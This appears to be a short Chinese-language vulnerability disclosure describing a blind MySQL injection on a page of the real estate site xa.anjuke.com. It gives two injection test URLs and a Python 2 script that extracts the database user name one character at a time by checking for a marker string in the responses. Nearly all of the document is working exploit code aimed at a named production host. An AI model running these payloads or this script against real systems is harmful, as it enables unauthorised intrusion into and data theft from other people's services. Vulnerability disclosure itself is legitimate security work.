安居客一处较隐蔽的MySQL注射(附验证脚本)

http://xa.anjuke.com/community/W0QQp1Z3724' AND length(user())=1 AND 'aaa'='aaa
 http://xa.anjuke.com/community/W0QQp1Z3724' AND length(user())!=1 AND 'aaa'='aaa

#encoding=utf-8
 import httplib
 import time
 import string
 import sys
 import random
 import urllib
 
 
 headers = {}
 payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
 
 print 'Start to retrive MySQL User:'
 user = ''
 for i in range(1,24,1):
     for payload in payloads:
         conn = httplib.HTTPConnection('xa.anjuke.com', timeout=60)
         conn.request(method='GET',
                      url = "/community/W0QQp1Z3724' AND ascii(mid(user()from(%s)for(1)))=%s AND 'aaa'='aaa" % (i, ord(payload)),
                      headers=headers)
         html_doc = conn.getresponse().read().decode('utf-8')
         conn.close()
         if html_doc.find(u"_zpq.push(['_setParams','','xa','城北','','']);") > 0:
             user += payload
             sys.stdout.write('/r[Scan in progress]' + user)
             sys.stdout.flush()
             break
         else:
             print '.',
 
 print '/n[Done]MySQL user is ' + user